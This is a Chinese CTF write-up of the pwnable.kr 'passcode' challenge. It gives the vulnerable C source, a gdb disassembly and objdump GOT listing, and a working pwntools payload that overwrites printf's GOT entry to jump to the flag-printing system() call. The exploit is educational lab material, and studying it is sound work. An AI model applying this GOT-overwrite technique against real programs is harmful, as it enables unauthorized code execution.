PWN学习之[Toddler''s Bottle]-[passcode]
来源:互联网 发布:手机淘宝联系天猫客服 编辑:程序博客网 时间:2024/05/29 09:07
打开passcode.c,可以看到源码如下:
#include <stdio.h>#include <stdlib.h>void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflush(stdin); // ha! mommy told me that 32bit is vulnerable to bruteforcing :) printf("enter passcode2 : "); scanf("%d", passcode2); printf("checking...\n"); if(passcode1==338150 && passcode2==13371337){ printf("Login OK!\n"); system("/bin/cat flag"); } else{ printf("Login Failed!\n"); exit(0); }}void welcome(){ char name[100]; printf("enter you name : "); scanf("%100s", name); printf("Welcome %s!\n", name);}int main(){ printf("Toddler's Secure Login System 1.0 beta.\n"); welcome(); login(); // something after login... printf("Now I can safely trust you that you have credential :)\n"); return 0; }
观察login()函数,可以看到在输入passcode1和passcode2时,由于scanf的变量没有使用&,执行scanf函数时,会将passcode当作地址执行。
使用gdb调试程序,奇怪的事情出现了,发现login和welcome函数的ebp相同。
经过计算发现,name(ebp-0x70)与passcode1(ebp-0x10)只相差96,而输入name时,scanf的长度限制为100,所以我们可以通过name来更改passcode1的值。
因此,我们可以利用got表复写技术,将printf,scanf等在程序中调用的函数在got表中的值改掉,这样程序调用函数时,通过got表就会进行到更改后的地址。
我们先通过objdump -R passcode 查看一下程序中函数在got中的地址。
passcode: file format elf32-i386DYNAMIC RELOCATION RECORDSOFFSET TYPE VALUE 08049ff0 R_386_GLOB_DAT __gmon_start__0804a02c R_386_COPY stdin@@GLIBC_2.00804a000 R_386_JUMP_SLOT printf@GLIBC_2.00804a004 R_386_JUMP_SLOT fflush@GLIBC_2.00804a008 R_386_JUMP_SLOT __stack_chk_fail@GLIBC_2.40804a00c R_386_JUMP_SLOT puts@GLIBC_2.00804a010 R_386_JUMP_SLOT system@GLIBC_2.00804a014 R_386_JUMP_SLOT __gmon_start__0804a018 R_386_JUMP_SLOT exit@GLIBC_2.00804a01c R_386_JUMP_SLOT __libc_start_main@GLIBC_2.00804a020 R_386_JUMP_SLOT __isoc99_scanf@GLIBC_2.7
看一下login函数
(gdb) disas loginDump of assembler code for function login: 0x08048564 <+0>: push %ebp 0x08048565 <+1>: mov %esp,%ebp 0x08048567 <+3>: sub $0x28,%esp 0x0804856a <+6>: mov $0x8048770,%eax 0x0804856f <+11>: mov %eax,(%esp) 0x08048572 <+14>: call 0x8048420 <printf@plt> 0x08048577 <+19>: mov $0x8048783,%eax 0x0804857c <+24>: mov -0x10(%ebp),%edx 0x0804857f <+27>: mov %edx,0x4(%esp) 0x08048583 <+31>: mov %eax,(%esp) 0x08048586 <+34>: call 0x80484a0 <__isoc99_scanf@plt> 0x0804858b <+39>: mov 0x804a02c,%eax 0x08048590 <+44>: mov %eax,(%esp) 0x08048593 <+47>: call 0x8048430 <fflush@plt> 0x08048598 <+52>: mov $0x8048786,%eax 0x0804859d <+57>: mov %eax,(%esp) 0x080485a0 <+60>: call 0x8048420 <printf@plt> 0x080485a5 <+65>: mov $0x8048783,%eax 0x080485aa <+70>: mov -0xc(%ebp),%edx 0x080485ad <+73>: mov %edx,0x4(%esp) 0x080485b1 <+77>: mov %eax,(%esp) 0x080485b4 <+80>: call 0x80484a0 <__isoc99_scanf@plt> 0x080485b9 <+85>: movl $0x8048799,(%esp) 0x080485c0 <+92>: call 0x8048450 <puts@plt> 0x080485c5 <+97>: cmpl $0x528e6,-0x10(%ebp) 0x080485cc <+104>: jne 0x80485f1 <login+141> 0x080485ce <+106>: cmpl $0xcc07c9,-0xc(%ebp) 0x080485d5 <+113>: jne 0x80485f1 <login+141> 0x080485d7 <+115>: movl $0x80487a5,(%esp) 0x080485de <+122>: call 0x8048450 <puts@plt> 0x080485e3 <+127>: movl $0x80487af,(%esp) //我们将要跳转的地方既got表修改后的值 0x080485ea <+134>: call 0x8048460 <system@plt> 0x080485ef <+139>: leave 0x080485f0 <+140>: ret 0x080485f1 <+141>: movl $0x80487bd,(%esp) 0x080485f8 <+148>: call 0x8048450 <puts@plt> 0x080485fd <+153>: movl $0x0,(%esp)---Type <return> to continue, or q <return> to quit--- 0x08048604 <+160>: call 0x8048480 <exit@plt>End of assembler dump.
我们选用printf函数,因此我们的payload即为
payload=’a’*96//填充name首地址与passcode1的空间
+0x804a000//更改passcode 为printf的地址
+134514147 //0x80485e3既system(“/bin/cat flag”) 因为scanf函数输入的是%d,所以采用十进制
>>> from pwn import *>>> p=0x804a000>>> s=0x80485e3>>> paylode='a'*96+p32(p)+str(s)>>> e=process("./passcode")[x] Starting local process './passcode'[+] Starting local process './passcode': Done>>> e.sendline(paylode)>>> e.recvline()[*] Process './passcode' stopped with exit code 0"Toddler's Secure Login System 1.0 beta.\n">>> e.recvline()'enter you name : Welcome aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!\n'>>> e.recvline()'Sorry mom.. I got confused about scanf usage :(\n'>>>
得到如上Sorry mom ..的flag
欢迎访问本人原博客查看更多文章 Magician.
阅读全文
0 0
- PWN学习之[Toddler''s Bottle]-[passcode]
- PWN学习之[Toddler''s Bottle]-[bof]
- PWN学习之[Toddler''s Bottle]-[fd]
- pwnable 笔记 Toddler's Bottle - passcode
- Pwnable之[Toddler's Bottle]
- [Toddler's Bottle]fd
- [Toddler's Bottle]collision
- [Toddler's Bottle]-[fd]
- [Toddler's Bottle]-collision
- [Toddler's Bottle]bof
- [Toddler's Bottle]flag
- [Toddler's Bottle]-[bof]
- [Toddler's Bottle]-[flag]
- [Toddler's Bottle]-[leg]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- PWN学习之[Toddler''s Bottle]-[bof]
- 安卓 消息队列 优先级 顺序
- PWN学习之[Toddler''s Bottle]-[fd]
- python列表中元素去重的几种方式
- 一个应用 可以有多个application
- PWN学习之[Toddler''s Bottle]-[passcode]
- 结构体大小
- 安卓系统启动过程
- 条件变量
- 用nginx的反向代理机制解决前端跨域问题
- 安卓 应用app启动过程
- nyoj267郁闷的c小加 中缀表达式转后缀求值
- 内存分哪些区 C++,ios,java
- gdb调试多进程多线程